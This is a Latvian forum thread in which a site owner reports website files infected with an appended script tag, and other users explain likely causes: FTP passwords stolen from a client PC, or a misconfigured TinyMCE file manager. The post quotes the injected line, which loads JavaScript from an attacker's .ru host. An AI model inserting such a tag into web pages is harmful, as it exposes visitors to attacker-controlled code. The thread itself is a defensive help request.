malware

[ebw]

sveiki!

gadiijusies te taada probleema ka uz mana hostinga dazhiem domeeniem ir sachakareeti faili..

izpauzhas tas taa, ka daudziem index*.*, default*.*, main*.* failiem beigaas (aiz </html> taga) ir piekabinaajies aptuveni sekojoshs kods

 

<script type="text/javascript" src="http://kautkas.ru:8080/kautkas.js"></script>
<!--8469f3ebb36bebb12b39b0f9e7fe5933-->

 

domeni no kura scripts izsaucas ir dazhaadi.. piem. greatrow.ru, moist.ru utt.

gribeeju pajautaat vai kaads ir saskaaries ar liidziigu nelaimi?

cik lasiiju, izskataas ka diezgan modiiga lieta - vismaz aarzemees ir kas no shii liidziiga ir cietushi.

kas vareetu buut pa iemeslu un kaa tas tika paveikts?

 

itkaa cik lasiiju sheit

http://blog.unmaskparasites.com/2010/06/17/malware-on-hijacked-subdomains-part-2/

runa ir par pieejas zagshanu no ftp klientiem.

[Kavacky]

"runa ir par pieejas zagshanu no ftp klientiem.

 

-> Tā arī tas ir paveikts.

[Mr.Key]

Tu vai kāds cits visdrīzāk ir atvēris uzlauztu web lapu, kas ielika drazu kompī. Draza noskanēja saglabātās ftp paroles, aizsūtīja uz midzeni un no midzeņa skripts veic ftp konekcijas un saliek index|default|main html, php un visiem js failiem galā savu vēstījumu.

 

Turklāt, ņemot vērā apjomus, tas visdrīzāk tiek darīts ar directory scan un file append metodēm (diez vai viņi uploado tos failus pie sevis. pašam nebija laika pētīt log failus)

 

P.S. Un MS IE tur ņepričom.

Edited October 21, 2010 by Mr.Key

[Maris-S]

FTP ir tikai viena no iespējām. Es jau šeit esmu rakstījis agrāk ka man līdzīga situācija kādreiz radās. Manā gadījumā problēmu radīja nepareizi sakonfigurēts TinyMCE file manageris, kas strādā kā TinyMCE plugins un kā atsevišķs skripts. Es vienkārši viņam nenomainīju noklusētos autentifikācijas uzstādījumus. Ar to arī modificēja failus.